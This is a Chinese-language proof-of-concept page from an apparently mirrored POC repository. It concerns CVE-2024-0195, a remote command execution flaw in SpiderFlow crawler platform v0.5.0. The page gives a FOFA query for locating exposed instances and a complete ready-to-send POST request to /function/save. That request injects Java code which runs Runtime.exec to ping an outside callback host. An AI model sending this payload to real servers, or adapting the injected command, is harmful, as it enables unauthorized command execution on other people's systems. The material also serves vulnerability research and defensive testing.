admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/SpiderFlow爬虫平台/SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.2 KiB
Raw Blame History

SpiderFlow爬虫平台存在远程命令执行漏洞CVE-2024-0195

一、漏洞简介

SpiderFlow是新一代开源爬虫平台以图形化方式定义爬虫流程不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞攻击者可以构造恶意命令远控服务器。

二、影响版本

  • SpiderFlow爬虫平台 v0.5.0

三、资产测绘

  • fofaapp="spiderflow"
  • 特征

1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551.png

四、漏洞复现

POST /function/save HTTP/1.1
Host: 
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 142

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+nccrflrlvu.yutu.eu.org')%3B%7B

1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf.png

更新: 2024-10-22 09:36:10
原文: https://www.yuque.com/xiaokp7/ocvun2/obeii8pkzzb4154z